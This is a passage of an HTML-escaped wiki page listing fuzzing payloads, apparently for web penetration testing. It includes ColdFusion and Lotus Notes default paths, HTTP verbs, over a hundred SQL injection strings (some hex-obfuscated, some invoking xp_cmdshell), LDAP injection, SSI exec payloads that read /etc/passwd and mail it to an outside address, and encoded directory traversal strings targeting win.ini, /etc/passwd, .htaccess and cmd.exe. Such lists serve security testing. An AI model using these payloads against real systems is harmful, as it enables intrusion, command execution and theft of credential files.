.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Some server side include statements&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
